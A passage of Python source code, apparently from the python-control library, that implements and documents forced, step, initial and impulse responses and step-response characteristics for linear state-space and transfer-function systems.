    Numbers (scalars) are converted to constant arrays with the correct shape.
    The correct shape is inferred from arguments `sys` and `T`.

    For information on the **shape** of parameters `U`, `T`, `X0` and
    return values `T`, `yout`, `xout`, see :ref:`time-series-convention`.

    Parameters
    ----------
    sys : StateSpace or TransferFunction
        LTI system to simulate
    T : array_like, optional for discrete LTI `sys`
        Time steps at which the input is defined; values must be evenly spaced.
        If None, `U` must be given and `len(U)` time steps of sys.dt are
        simulated. If sys.dt is None or True (undetermined time step), a time
        step of 1.0 is assumed.
    U : array_like or float, optional
        Input array giving input at each time `T`.
        If `U` is None or 0, `T` must be given, even for discrete
        time systems. In this case, for continuous time systems, a direct
        calculation of the matrix exponential is used, which is faster than the
        general interpolating algorithm used otherwise.
    X0 : array_like or float, default=0.
        Initial condition.
    transpose : bool, default=False
        If True, transpose all input and output arrays (for backward
        compatibility with MATLAB and :func:`scipy.signal.lsim`).
    interpolate : bool, default=False
        If True and system is a discrete time system, the input will
        be interpolated between the given time steps and the output
        will be given at system sampling rate. Otherwise, only return
        the output at the times given in `T`. No effect on continuous
        time simulations.
    return_x : bool, default=None
        Used if the time response data is assigned to a tuple:

        * If False, return only the time and output vectors.
        * If True, also return the state vector.
        * If None, determine the returned variables by
          config.defaults['forced_response.return_x'], which was True
          before version 0.9 and is False since then.
    squeeze : bool, optional
        By default, if a system is single-input, single-output (SISO) then
        the output response is returned as a 1D array (indexed by time). If
        `squeeze` is True, remove single-dimensional entries from the shape of
        the output even if the system is not SISO. If `squeeze` is False, keep
        the output as a 2D array (indexed by the output number and time)
        even if the system is SISO. The default behavior can be overridden by
        config.defaults['control.squeeze_time_response'].

    Returns
    -------
    results : TimeResponseData
        Time response represented as a :class:`TimeResponseData` object
        containing the following properties:

        * time (array): Time values of the output.
        * outputs (array): Response of the system. If the system is SISO and
          `squeeze` is not True, the array is 1D (indexed by time). If the
          system is not SISO or `squeeze` is False, the array is 2D (indexed
          by output and time).
        * states (array): Time evolution of the state vector, represented as
          a 2D array indexed by state and time.
        * inputs (array): Input(s) to the system, indexed by input and time.

        The return value of the system can also be accessed by assigning the
        function to a tuple of length 2 (time, output) or of length 3 (time,
        output, state) if ``return_x`` is ``True``.

    See Also
    --------
    step_response, initial_response, impulse_response

    Notes
    -----
    For discrete time systems, the input/output response is computed using the
    :func:`scipy.signal.dlsim` function.

    For continuous time systems, the output is computed using the matrix
    exponential `exp(A t)` and assuming linear interpolation of the inputs
    between time points.

    Examples
    --------
    >>> T, yout, xout = forced_response(sys, T, u, X0)

    See :ref:`time-series-convention` and
    :ref:`package-configuration-parameters`.
    """
    if not isinstance(sys, (StateSpace, TransferFunction)):
        raise TypeError('Parameter ``sys``: must be a ``StateSpace`` or'
                        ' ``TransferFunction``)')

    # If return_x was not specified, figure out the default
    if return_x is None:
        return_x = config.defaults['forced_response.return_x']

    # If return_x is used for TransferFunction, issue a warning
    if return_x and isinstance(sys, TransferFunction):
        warnings.warn(
            "return_x specified for a transfer function system. Internal "
            "conversion to state space used; results may meaningless.")

    # If we are passed a transfer function and X0 is non-zero, warn the user
    if isinstance(sys, TransferFunction) and np.any(X0 != 0):
        warnings.warn(
            "Non-zero initial condition given for transfer function system. "
            "Internal conversion to state space used; may not be consistent "
            "with given X0.")

    # All simulation is done on the (converted) state space representation
    sys = _convert_to_statespace(sys)
    A, B, C, D = np.asarray(sys.A), np.asarray(sys.B), np.asarray(sys.C), \
        np.asarray(sys.D)
    # d_type = A.dtype
    n_states = A.shape[0]
    n_inputs = B.shape[1]
    n_outputs = C.shape[0]

    # Convert inputs to numpy arrays for easier shape checking
    if U is not None:
        U = np.asarray(U)
    if T is not None:
        # T must be array-like
        T = np.asarray(T)

    # Set and/or check time vector in discrete time case
    if isdtime(sys):
        if T is None:
            if U is None or (U.ndim == 0 and U == 0.):
                raise ValueError('Parameters ``T`` and ``U`` can\'t both be '
                                 'zero for discrete-time simulation')
            # Set T to equally spaced samples with same length as U
            if U.ndim == 1:
                n_steps = U.shape[0]
            else:
                n_steps = U.shape[1]
            dt = 1. if sys.dt in [True, None] else sys.dt
            T = np.array(range(n_steps)) * dt
        else:
            # Make sure the input vector and time vector have same length
            if (U.ndim == 1 and U.shape[0] != T.shape[0]) or \
                    (U.ndim > 1 and U.shape[1] != T.shape[0]):
                raise ValueError('Parameter ``T`` must have same elements as'
                                 ' the number of columns in input array ``U``')
        # Broadcast a scalar input to a constant input over all time steps
        if U.ndim == 0:
            U = np.full((n_inputs, T.shape[0]), U)
    else:
        if T is None:
            raise ValueError('Parameter ``T`` is mandatory for continuous '
                             'time systems.')

    # Test if T has shape (n,) or (1, n);
    T = _check_convert_array(T, [('any',), (1, 'any')],
                             'Parameter ``T``: ', squeeze=True,
                             transpose=transpose)

    n_steps = T.shape[0]            # number of simulation steps

    # equally spaced also implies strictly monotonic increase,
    dt = (T[-1] - T[0]) / (n_steps - 1)
    if not np.allclose(np.diff(T), dt):
        raise ValueError("Parameter ``T``: time values must be equally "
                         "spaced.")

    # create X0 if not given, test if X0 has correct shape
    X0 = _check_convert_array(X0, [(n_states,), (n_states, 1)],
                              'Parameter ``X0``: ', squeeze=True)

    # Test if U has correct shape and type
    legal_shapes = [(n_steps,), (1, n_steps)] if n_inputs == 1 else \
        [(n_inputs, n_steps)]
    U = _check_convert_array(U, legal_shapes,
                             'Parameter ``U``: ', squeeze=False,
                             transpose=transpose)

    # Pre-allocate the state and output trajectories
    xout = np.zeros((n_states, n_steps))
    xout[:, 0] = X0
    yout = np.zeros((n_outputs, n_steps))

    # Separate out the discrete and continuous time cases
    if isctime(sys, strict=True):
        # Solve the differential equation, copied from scipy.signal.ltisys.

        # Faster algorithm if U is zero
        # (if not None, it was converted to array above)
        if U is None or np.all(U == 0):
            # Solve using matrix exponential
            expAdt = sp.linalg.expm(A * dt)
            for i in range(1, n_steps):
                xout[:, i] = expAdt @ xout[:, i-1]
            yout = C @ xout

        # General algorithm that interpolates U in between output points
        else:
            # convert input from 1D array to 2D array with only one row
            if U.ndim == 1:
                U = U.reshape(1, -1)  # pylint: disable=E1103

            # Algorithm: to integrate from time 0 to time dt, with linear
            # interpolation between inputs u(0) = u0 and u(dt) = u1, we solve
            #   xdot = A x + B u,        x(0) = x0
            #   udot = (u1 - u0) / dt,   u(0) = u0.
            #
            # Solution is
            #   [ x(dt) ]       [ A*dt  B*dt  0 ] [  x0   ]
            #   [ u(dt) ] = exp [  0     0    I ] [  u0   ]
            #   [u1 - u0]       [  0     0    0 ] [u1 - u0]

            M = np.block([[A * dt, B * dt, np.zeros((n_states, n_inputs))],
                          [np.zeros((n_inputs, n_states + n_inputs)),
                           np.identity(n_inputs)],
                          [np.zeros((n_inputs, n_states + 2 * n_inputs))]])
            expM = sp.linalg.expm(M)
            Ad = expM[:n_states, :n_states]
            Bd1 = expM[:n_states, n_states+n_inputs:]
            Bd0 = expM[:n_states, n_states:n_states + n_inputs] - Bd1

            for i in range(1, n_steps):
                xout[:, i] = (Ad @ xout[:, i-1]
                              + Bd0 @ U[:, i-1] + Bd1 @ U[:, i])
            yout = C @ xout + D @ U
        tout = T

    else:
        # Discrete type system => use SciPy signal processing toolbox

        # sp.signal.dlsim assumes T[0] == 0
        spT = T - T[0]

        if sys.dt is not True and sys.dt is not None:
            # Make sure that the time increment is a multiple of sampling time

            # First make sure that time increment is bigger than sampling time
            # (with allowance for small precision errors)
            if dt < sys.dt and not np.isclose(dt, sys.dt):
                raise ValueError("Time steps ``T`` must match sampling time")

            # Now check to make sure it is a multiple (with check against
            # sys.dt because floating point mod can have small errors
            if not (np.isclose(dt % sys.dt, 0) or
                    np.isclose(dt % sys.dt, sys.dt)):
                raise ValueError("Time steps ``T`` must be multiples of "
                                 "sampling time")
            sys_dt = sys.dt

            # sp.signal.dlsim returns not enough samples if
            # T[-1] - T[0] < sys_dt * decimation * (n_steps - 1)
            # due to rounding errors.
            # https://github.com/scipy/scipy/blob/v1.6.1/scipy/signal/ltisys.py#L3462
            scipy_out_samples = int(np.floor(spT[-1] / sys_dt)) + 1
            if scipy_out_samples < n_steps:
                # parentheses: order of evaluation is important
                spT[-1] = spT[-1] * (n_steps / (spT[-1] / sys_dt + 1))

        else:
            sys_dt = dt         # For unspecified sampling time, use time incr

        # Discrete time simulation using signal processing toolbox
        dsys = (A, B, C, D, sys_dt)

        # Use signal processing toolbox for the discrete time simulation
        # Transpose the input to match toolbox convention
        tout, yout, xout = sp.signal.dlsim(dsys, np.transpose(U), spT, X0)
        tout = tout + T[0]

        if not interpolate:
            # If dt is different from sys.dt, resample the output
            inc = int(round(dt / sys_dt))
            tout = T            # Return exact list of time steps
            yout = yout[::inc, :]
            xout = xout[::inc, :]
        else:
            # Interpolate the input to get the right number of points
            U = sp.interpolate.interp1d(T, U)(tout)

        # Transpose the output and state vectors to match local convention
        xout = np.transpose(xout)
        yout = np.transpose(yout)

    return TimeResponseData(
        tout, yout, xout, U, issiso=sys.issiso(),
        transpose=transpose, return_x=return_x, squeeze=squeeze)
# Process time responses in a uniform way
def _process_time_response(
tout, yout, issiso=False, transpose=None, squeeze=None):
"""Process time response signals.
This function processes the outputs (or inputs) of time response
functions and processes the transpose and squeeze keywords.
Parameters
----------
T : 1D array
Time values of the output. Ignored if None.
yout : ndarray
Response of the system. This can either be a 1D array indexed by time
(for SISO systems), a 2D array indexed by output and time (for MIMO
systems with no input indexing, such as initial_response or forced
response) or a 3D array indexed by output, input, and time.
issiso : bool, optional
If ``True``, process data as single-input, single-output data.
Default is ``False``.
transpose : bool, optional
If True, transpose all input and output arrays (for backward
compatibility with MATLAB and :func:`scipy.signal.lsim`). Default
value is False.
squeeze : bool, optional
By default, if a system is single-input, single-output (SISO) then the
output response is returned as a 1D array (indexed by time). If
squeeze=True, remove single-dimensional entries from the shape of the
output even if the system is not SISO. If squeeze=False, keep the
output as a 3D array (indexed by the output, input, and time) even if
the system is SISO. The default value can be set using
config.defaults['control.squeeze_time_response'].
Returns
-------
T : 1D array
Time values of the output.
yout : ndarray
Response of the system. If the system is SISO and squeeze is not
True, the array is 1D (indexed by time). If the system is not SISO or
squeeze is False, the array is either 2D (indexed by output and time)
or 3D (indexed by input, output, and time).
"""
# If squeeze was not specified, figure out the default (might remain None)
if squeeze is None:
squeeze = config.defaults['control.squeeze_time_response']
# Figure out whether and how to squeeze output data
if squeeze is True: # squeeze all dimensions
yout = np.squeeze(yout)
elif squeeze is False: # squeeze no dimensions
pass
elif squeeze is None: # squeeze signals if SISO
if issiso:
if yout.ndim == 3:
yout = yout[0][0] # remove input and output
else:
yout = yout[0] # remove input
else:
raise ValueError("Unknown squeeze value")
# See if we need to transpose the data back into MATLAB form
if transpose:
# Transpose time vector in case we are using np.matrix
tout = np.transpose(tout)
# For signals, put the last index (time) into the first slot
yout = np.transpose(yout, np.roll(range(yout.ndim), 1))
# Return time, output, and (optionally) state
return tout, yout
def _get_ss_simo(sys, input=None, output=None, squeeze=None):
    """Return a SISO or SIMO state-space version of sys.

    This function converts the given system to a state space system in
    preparation for simulation and sets the system matrixes to match the
    desired input and output.

    If input is not specified, select first input and issue warning (legacy
    behavior that should eventually not be used).

    If the output is not specified, report on all outputs.
    """
    # Resolve the default squeeze setting from the configuration
    if squeeze is None:
        squeeze = config.defaults['control.squeeze_time_response']

    sys_ss = _convert_to_statespace(sys)
    if sys_ss.issiso():
        return squeeze, sys_ss

    if squeeze is None and (input is None or output is None):
        # Don't squeeze outputs if resulting system turns out to be siso
        # Note: if we expand input to allow a tuple, need to update this check
        squeeze = False

    # Fall back to the first input, warning the caller about the default
    warn = input is None
    if warn:
        input = 0

    if output is None:
        return squeeze, _mimo2simo(sys_ss, input, warn_conversion=warn)
    return squeeze, _mimo2siso(sys_ss, input, output, warn_conversion=warn)
def step_response(sys, T=None, X0=0., input=None, output=None, T_num=None,
                  transpose=False, return_x=False, squeeze=None):
    # pylint: disable=W0622
    """Compute the step response for a linear system.
    If the system has multiple inputs and/or multiple outputs, the step
    response is computed for each input/output pair, with all other inputs set
    to zero. Optionally, a single input and/or single output can be selected,
    in which case all other inputs are set to 0 and all other outputs are
    ignored.
    For information on the **shape** of parameters `T`, `X0` and
    return values `T`, `yout`, see :ref:`time-series-convention`.
    Parameters
    ----------
    sys : StateSpace or TransferFunction
        LTI system to simulate
    T : array_like or float, optional
        Time vector, or simulation time duration if a number. If T is not
        provided, an attempt is made to create it automatically from the
        dynamics of sys. If sys is continuous-time, the time increment dt
        is chosen small enough to show the fastest mode, and the simulation
        time period tfinal long enough to show the slowest mode, excluding
        poles at the origin and pole-zero cancellations. If this results in
        too many time steps (>5000), dt is reduced. If sys is discrete-time,
        only tfinal is computed, and final is reduced if it requires too
        many simulation steps.
    X0 : array_like or float, optional
        Initial condition (default = 0). Numbers are converted to constant
        arrays with the correct shape.
    input : int, optional
        Only compute the step response for the listed input. If not
        specified, the step responses for each independent input are
        computed (as separate traces).
    output : int, optional
        Only report the step response for the listed output. If not
        specified, all outputs are reported.
    T_num : int, optional
        Number of time steps to use in simulation if T is not provided as an
        array (autocomputed if not given); ignored if sys is discrete-time.
    transpose : bool, optional
        If True, transpose all input and output arrays (for backward
        compatibility with MATLAB and :func:`scipy.signal.lsim`). Default
        value is False.
    return_x : bool, optional
        If True, return the state vector when assigning to a tuple (default =
        False). See :func:`forced_response` for more details.
    squeeze : bool, optional
        By default, if a system is single-input, single-output (SISO) then the
        output response is returned as a 1D array (indexed by time). If
        squeeze=True, remove single-dimensional entries from the shape of the
        output even if the system is not SISO. If squeeze=False, keep the
        output as a 3D array (indexed by the output, input, and time) even if
        the system is SISO. The default value can be set using
        config.defaults['control.squeeze_time_response'].
    Returns
    -------
    results : TimeResponseData
        Time response represented as a :class:`TimeResponseData` object
        containing the following properties:
        * time (array): Time values of the output.
        * outputs (array): Response of the system. If the system is SISO and
          squeeze is not True, the array is 1D (indexed by time). If the
          system is not SISO or ``squeeze`` is False, the array is 3D (indexed
          by the output, trace, and time).
        * states (array): Time evolution of the state vector, represented as
          either a 2D array indexed by state and time (if SISO) or a 3D array
          indexed by state, trace, and time. Not affected by ``squeeze``.
        * inputs (array): Input(s) to the system, indexed in the same manner
          as ``outputs``.
        The return value of the system can also be accessed by assigning the
        function to a tuple of length 2 (time, output) or of length 3 (time,
        output, state) if ``return_x`` is ``True``.
    See Also
    --------
    forced_response, initial_response, impulse_response
    Notes
    -----
    This function uses the `forced_response` function with the input set to a
    unit step.
    Examples
    --------
    >>> T, yout = step_response(sys, T, X0)
    """
    # Create the time and input vectors
    # A scalar T is treated as a duration and expanded into a full vector
    if T is None or np.asarray(T).size == 1:
        T = _default_time_vector(sys, N=T_num, tfinal=T, is_step=True)
    # Unit-step input sampled at every time point
    U = np.ones_like(T)
    # If we are passed a transfer function and X0 is non-zero, warn the user
    if isinstance(sys, TransferFunction) and np.any(X0 != 0):
        warnings.warn(
            "Non-zero initial condition given for transfer function system. "
            "Internal conversion to state space used; may not be consistent "
            "with given X0.")
    # Convert to state space so that we can simulate
    sys = _convert_to_statespace(sys)
    # Set up arrays to handle the output
    # One "trace" per simulated input unless a single input was requested
    ninputs = sys.ninputs if input is None else 1
    noutputs = sys.noutputs if output is None else 1
    yout = np.empty((noutputs, ninputs, np.asarray(T).size))
    xout = np.empty((sys.nstates, ninputs, np.asarray(T).size))
    uout = np.empty((ninputs, ninputs, np.asarray(T).size))
    # Simulate the response for each input
    for i in range(sys.ninputs):
        # If input keyword was specified, only simulate for that input
        if isinstance(input, int) and i != input:
            continue
        # Create a set of single inputs system for simulation
        squeeze, simo = _get_ss_simo(sys, i, output, squeeze=squeeze)
        response = forced_response(simo, T, U, X0, squeeze=True)
        # Map simulated input i to its slot in the trace dimension
        inpidx = i if input is None else 0
        yout[:, inpidx, :] = response.y
        xout[:, inpidx, :] = response.x
        # NOTE(review): this fills *every* input row of trace inpidx with
        # the unit step; presumably only row i should carry the step while
        # the others stay zero -- confirm against TimeResponseData usage.
        uout[:, inpidx, :] = U
    # Figure out if the system is SISO or not
    issiso = sys.issiso() or (input is not None and output is not None)
    # ``response`` here is the result of the last simulated input; only its
    # (shared) time vector is reused below.
    return TimeResponseData(
        response.time, yout, xout, uout, issiso=issiso,
        transpose=transpose, return_x=return_x, squeeze=squeeze)
def step_info(sysdata, T=None, T_num=None, yfinal=None,
              SettlingTimeThreshold=0.02, RiseTimeLimits=(0.1, 0.9)):
    """
    Step response characteristics (Rise time, Settling Time, Peak and others).
    Parameters
    ----------
    sysdata : StateSpace or TransferFunction or array_like
        The system data. Either LTI system to similate (StateSpace,
        TransferFunction), or a time series of step response data.
    T : array_like or float, optional
        Time vector, or simulation time duration if a number (time vector is
        autocomputed if not given, see :func:`step_response` for more detail).
        Required, if sysdata is a time series of response data.
    T_num : int, optional
        Number of time steps to use in simulation if T is not provided as an
        array; autocomputed if not given; ignored if sysdata is a
        discrete-time system or a time series or response data.
    yfinal : scalar or array_like, optional
        Steady-state response. If not given, sysdata.dcgain() is used for
        systems to simulate and the last value of the the response data is
        used for a given time series of response data. Scalar for SISO,
        (noutputs, ninputs) array_like for MIMO systems.
    SettlingTimeThreshold : float, optional
        Defines the error to compute settling time (default = 0.02)
    RiseTimeLimits : tuple (lower_threshold, upper_theshold)
        Defines the lower and upper threshold for RiseTime computation
    Returns
    -------
    S : dict or list of list of dict
        If `sysdata` corresponds to a SISO system, S is a dictionary
        containing:
        RiseTime:
            Time from 10% to 90% of the steady-state value.
        SettlingTime:
            Time to enter inside a default error of 2%
        SettlingMin:
            Minimum value after RiseTime
        SettlingMax:
            Maximum value after RiseTime
        Overshoot:
            Percentage of the Peak relative to steady value
        Undershoot:
            Percentage of undershoot
        Peak:
            Absolute peak value
        PeakTime:
            time of the Peak
        SteadyStateValue:
            Steady-state value
        If `sysdata` corresponds to a MIMO system, `S` is a 2D list of dicts.
        To get the step response characteristics from the j-th input to the
        i-th output, access ``S[i][j]``
    See Also
    --------
    step, lsim, initial, impulse
    Examples
    --------
    >>> from control import step_info, TransferFunction
    >>> sys = TransferFunction([-1, 1], [1, 1, 1])
    >>> S = step_info(sys)
    >>> for k in S:
    ...     print(f"{k}: {S[k]:3.4}")
    ...
    RiseTime: 1.256
    SettlingTime: 9.071
    SettlingMin: 0.9011
    SettlingMax: 1.208
    Overshoot: 20.85
    Undershoot: 27.88
    Peak: 1.208
    PeakTime: 4.187
    SteadyStateValue: 1.0
    MIMO System: Simulate until a final time of 10. Get the step response
    characteristics for the second input and specify a 5% error until the
    signal is considered settled.
    >>> from numpy import sqrt
    >>> from control import step_info, StateSpace
    >>> sys = StateSpace([[-1., -1.],
    ...                   [1., 0.]],
    ...                  [[-1./sqrt(2.), 1./sqrt(2.)],
    ...                   [0, 0]],
    ...                  [[sqrt(2.), -sqrt(2.)]],
    ...                  [[0, 0]])
    >>> S = step_info(sys, T=10., SettlingTimeThreshold=0.05)
    >>> for k, v in S[0][1].items():
    ...     print(f"{k}: {float(v):3.4}")
    RiseTime: 1.212
    SettlingTime: 6.061
    SettlingMin: -1.209
    SettlingMax: -0.9184
    Overshoot: 20.87
    Undershoot: 28.02
    Peak: 1.209
    PeakTime: 4.242
    SteadyStateValue: -1.0
    """
    if isinstance(sysdata, (StateSpace, TransferFunction)):
        if T is None or np.asarray(T).size == 1:
            T = _default_time_vector(sysdata, N=T_num, tfinal=T, is_step=True)
        T, Yout = step_response(sysdata, T, squeeze=False)
        # BUG FIX: test for ``None`` explicitly.  ``if yfinal:`` raised a
        # ValueError for array-valued yfinal (ambiguous truth value) and
        # silently ignored a legitimate steady-state value of 0.
        if yfinal is not None:
            InfValues = np.atleast_2d(yfinal)
        else:
            InfValues = np.atleast_2d(sysdata.dcgain())
        retsiso = sysdata.issiso()
        noutputs = sysdata.noutputs
        ninputs = sysdata.ninputs
    else:
        # Time series of response data
        errmsg = ("`sys` must be a LTI system, or time response data"
                  " with a shape following the python-control"
                  " time series data convention.")
        try:
            Yout = np.array(sysdata, dtype=float)
        except ValueError:
            raise ValueError(errmsg)
        if Yout.ndim == 1 or (Yout.ndim == 2 and Yout.shape[0] == 1):
            # 1D (or row-vector) data: treat as a single SISO trace
            Yout = Yout[np.newaxis, np.newaxis, :]
            retsiso = True
        elif Yout.ndim == 3:
            retsiso = False
        else:
            raise ValueError(errmsg)
        if T is None or Yout.shape[2] != len(np.squeeze(T)):
            raise ValueError("For time response data, a matching time vector"
                             " must be given")
        T = np.squeeze(T)
        noutputs = Yout.shape[0]
        ninputs = Yout.shape[1]
        # Same ``None`` fix as above; fall back to the last sample
        InfValues = np.atleast_2d(yfinal) if yfinal is not None \
            else Yout[:, :, -1]
    ret = []
    for i in range(noutputs):
        retrow = []
        for j in range(ninputs):
            yout = Yout[i, j, :]
            # Steady state value
            InfValue = InfValues[i, j]
            sgnInf = np.sign(InfValue.real)
            # Defaults returned when the steady state is NaN/inf
            # (np.nan/np.inf: the np.NaN/np.Inf aliases were removed in
            # NumPy 2.0)
            rise_time: float = np.nan
            settling_time: float = np.nan
            settling_min: float = np.nan
            settling_max: float = np.nan
            peak_value: float = np.inf
            peak_time: float = np.inf
            undershoot: float = np.nan
            overshoot: float = np.nan
            steady_state_value: complex = np.nan
            if not np.isnan(InfValue) and not np.isinf(InfValue):
                # RiseTime: first crossings of the lower/upper thresholds
                tr_lower_index = np.where(
                    sgnInf * (yout - RiseTimeLimits[0] * InfValue) >= 0
                    )[0][0]
                tr_upper_index = np.where(
                    sgnInf * (yout - RiseTimeLimits[1] * InfValue) >= 0
                    )[0][0]
                rise_time = T[tr_upper_index] - T[tr_lower_index]
                # SettlingTime: first instant after the last threshold exit
                settled = np.where(
                    np.abs(yout/InfValue-1) >= SettlingTimeThreshold)[0][-1]+1
                # MIMO systems can have unsettled channels without infinite
                # InfValue
                if settled < len(T):
                    settling_time = T[settled]
                settling_min = min((yout[tr_upper_index:]).min(), InfValue)
                settling_max = max((yout[tr_upper_index:]).max(), InfValue)
                # Overshoot
                y_os = (sgnInf * yout).max()
                dy_os = np.abs(y_os) - np.abs(InfValue)
                if dy_os > 0:
                    overshoot = np.abs(100. * dy_os / InfValue)
                else:
                    overshoot = 0
                # Undershoot : InfValue and undershoot must have opposite sign
                y_us_index = (sgnInf * yout).argmin()
                y_us = yout[y_us_index]
                if (sgnInf * y_us) < 0:
                    undershoot = (-100. * y_us / InfValue)
                else:
                    undershoot = 0
                # Peak
                peak_index = np.abs(yout).argmax()
                peak_value = np.abs(yout[peak_index])
                peak_time = T[peak_index]
                # SteadyStateValue
                steady_state_value = InfValue
            retij = {
                'RiseTime': rise_time,
                'SettlingTime': settling_time,
                'SettlingMin': settling_min,
                'SettlingMax': settling_max,
                'Overshoot': overshoot,
                'Undershoot': undershoot,
                'Peak': peak_value,
                'PeakTime': peak_time,
                'SteadyStateValue': steady_state_value
                }
            retrow.append(retij)
        ret.append(retrow)
    return ret[0][0] if retsiso else ret
def initial_response(sys, T=None, X0=0., input=0, output=None, T_num=None,
                     transpose=False, return_x=False, squeeze=None):
    # pylint: disable=W0622
    """Initial condition response of a linear system

    Compute the response of ``sys`` to its initial condition ``X0`` with
    the input held at zero.  For a MIMO system a single output may
    optionally be selected; if no selection is made, all outputs are
    returned.

    See :ref:`time-series-convention` for the shapes of `T`, `X0` and the
    returned arrays.

    Parameters
    ----------
    sys : StateSpace or TransferFunction
        LTI system to simulate.
    T : array_like or float, optional
        Time vector, or simulation time duration if a number (the time
        vector is autocomputed if not given; see :func:`step_response`
        for more detail).
    X0 : array_like or float, optional
        Initial condition (default = 0).  Numbers are converted to
        constant arrays with the correct shape.
    input : int
        Ignored; has no meaning for an initial condition calculation and
        exists only for signature compatibility with
        :func:`step_response` and :func:`impulse_response`.
    output : int
        Index of the output used in this simulation.  Set to None to
        keep all outputs.
    T_num : int, optional
        Number of time steps to use in simulation if T is not provided
        as an array (autocomputed if not given); ignored if sys is
        discrete-time.
    transpose : bool, optional
        If True, transpose all input and output arrays (for backward
        compatibility with MATLAB and :func:`scipy.signal.lsim`).
        Default value is False.
    return_x : bool, optional
        If True, return the state vector when assigning to a tuple
        (default = False).  See :func:`forced_response` for details.
    squeeze : bool, optional
        By default a SISO response is returned as a 1D array (indexed by
        time).  squeeze=True removes all single-dimensional entries from
        the output shape even for non-SISO systems; squeeze=False keeps
        the output as a 2D array (output number x time) even for SISO
        systems.  The default can be set with
        config.defaults['control.squeeze_time_response'].

    Returns
    -------
    results : TimeResponseData
        Time response object with the properties:
        * time (array): Time values of the output.
        * outputs (array): Response of the system; 1D (time) for SISO
          systems unless ``squeeze`` says otherwise, 2D (output x time)
          otherwise.
        * states (array): Time evolution of the state vector (state x
          time for SISO); not affected by ``squeeze``.
        The object can also be unpacked as a tuple ``(time, output)`` or
        ``(time, output, state)`` when ``return_x`` is ``True``.

    See Also
    --------
    forced_response, impulse_response, step_response

    Notes
    -----
    Implemented via :func:`forced_response` with the input set to zero.

    Examples
    --------
    >>> T, yout = initial_response(sys, T, X0)
    """
    squeeze, sys = _get_ss_simo(sys, input, output, squeeze=squeeze)
    # Build a default time vector when only a duration (or nothing) was
    # given; argument checking happens inside forced_response(), which
    # also constructs the initial state vector X0 if needed.
    if T is None or np.asarray(T).size == 1:
        T = _default_time_vector(sys, N=T_num, tfinal=T, is_step=False)
    # Zero input: the response is driven purely by the initial condition
    sim = forced_response(sys, T, 0, X0)
    # SISO determination mirrors the other response functions
    siso = sys.issiso() or (input is not None and output is not None)
    # Package the result without an input signal
    return TimeResponseData(
        sim.t, sim.y, sim.x, None, issiso=siso,
        transpose=transpose, return_x=return_x, squeeze=squeeze)
def impulse_response(sys, T=None, X0=0., input=None, output=None, T_num=None,
                     transpose=False, return_x=False, squeeze=None):
    # pylint: disable=W0622
    """Compute the impulse response for a linear system.
    If the system has multiple inputs and/or multiple outputs, the impulse
    response is computed for each input/output pair, with all other inputs set
    to zero. Optionally, a single input and/or single output can be selected,
    in which case all other inputs are set to 0 and all other outputs are
    ignored.
    For information on the **shape** of parameters `T`, `X0` and
    return values `T`, `yout`, see :ref:`time-series-convention`.
    Parameters
    ----------
    sys : StateSpace, TransferFunction
        LTI system to simulate
    T : array_like or float, optional
        Time vector, or simulation time duration if a scalar (time vector is
        autocomputed if not given; see :func:`step_response` for more detail)
    X0 : array_like or float, optional
        Initial condition (default = 0)
        Numbers are converted to constant arrays with the correct shape.
    input : int, optional
        Only compute the impulse response for the listed input. If not
        specified, the impulse responses for each independent input are
        computed.
    output : int, optional
        Only report the step response for the listed output. If not
        specified, all outputs are reported.
    T_num : int, optional
        Number of time steps to use in simulation if T is not provided as an
        array (autocomputed if not given); ignored if sys is discrete-time.
    transpose : bool, optional
        If True, transpose all input and output arrays (for backward
        compatibility with MATLAB and :func:`scipy.signal.lsim`). Default
        value is False.
    return_x : bool, optional
        If True, return the state vector when assigning to a tuple (default =
        False). See :func:`forced_response` for more details.
    squeeze : bool, optional
        By default, if a system is single-input, single-output (SISO) then the
        output response is returned as a 1D array (indexed by time). If
        squeeze=True, remove single-dimensional entries from the shape of the
        output even if the system is not SISO. If squeeze=False, keep the
        output as a 2D array (indexed by the output number and time) even if
        the system is SISO. The default value can be set using
        config.defaults['control.squeeze_time_response'].
    Returns
    -------
    results : TimeResponseData
        Impulse response represented as a :class:`TimeResponseData` object
        containing the following properties:
        * time (array): Time values of the output.
        * outputs (array): Response of the system. If the system is SISO and
          squeeze is not True, the array is 1D (indexed by time). If the
          system is not SISO or ``squeeze`` is False, the array is 3D (indexed
          by the output, trace, and time).
        * states (array): Time evolution of the state vector, represented as
          either a 2D array indexed by state and time (if SISO) or a 3D array
          indexed by state, trace, and time. Not affected by ``squeeze``.
        The return value of the system can also be accessed by assigning the
        function to a tuple of length 2 (time, output) or of length 3 (time,
        output, state) if ``return_x`` is ``True``.
    See Also
    --------
    forced_response, initial_response, step_response
    Notes
    -----
    This function uses the `forced_response` function to compute the time
    response. For continuous time systems, the initial condition is altered to
    account for the initial impulse.
    Examples
    --------
    >>> T, yout = impulse_response(sys, T, X0)
    """
    # Convert to state space so that we can simulate
    sys = _convert_to_statespace(sys)
    # Check to make sure there is not a direct term
    if np.any(sys.D != 0) and isctime(sys):
        warnings.warn("System has direct feedthrough: ``D != 0``. The "
                      "infinite impulse at ``t=0`` does not appear in the "
                      "output.\n"
                      "Results may be meaningless!")
    # create X0 if not given, test if X0 has correct shape.
    # Must be done here because it is used for computations below.
    n_states = sys.A.shape[0]
    X0 = _check_convert_array(X0, [(n_states,), (n_states, 1)],
                              'Parameter ``X0``: \n', squeeze=True)
    # Compute T and U, no checks necessary, will be checked in forced_response
    if T is None or np.asarray(T).size == 1:
        T = _default_time_vector(sys, N=T_num, tfinal=T, is_step=False)
    # Input starts as all zeros; for discrete-time systems the first sample
    # is overwritten inside the loop below to approximate the impulse
    U = np.zeros_like(T)
    # Set up arrays to handle the output
    ninputs = sys.ninputs if input is None else 1
    noutputs = sys.noutputs if output is None else 1
    yout = np.empty((noutputs, ninputs, np.asarray(T).size))
    xout = np.empty((sys.nstates, ninputs, np.asarray(T).size))
    # Inputs are reported as None: an ideal impulse has no finite samples
    uout = np.full((ninputs, ninputs, np.asarray(T).size), None)
    # Simulate the response for each input
    for i in range(sys.ninputs):
        # If input keyword was specified, only handle that case
        if isinstance(input, int) and i != input:
            continue
        # Get the system we need to simulate
        squeeze, simo = _get_ss_simo(sys, i, output, squeeze=squeeze)
        #
        # Compute new X0 that contains the impulse
        #
        # We can't put the impulse into U because there is no numerical
        # representation for it (infinitesimally short, infinitely high).
        # See also: http://www.mathworks.com/support/tech-notes/1900/1901.html
        #
        if isctime(simo):
            # Continuous time: fold the impulse into the initial state, x0+B
            B = np.asarray(simo.B).squeeze()
            new_X0 = B + X0
        else:
            new_X0 = X0
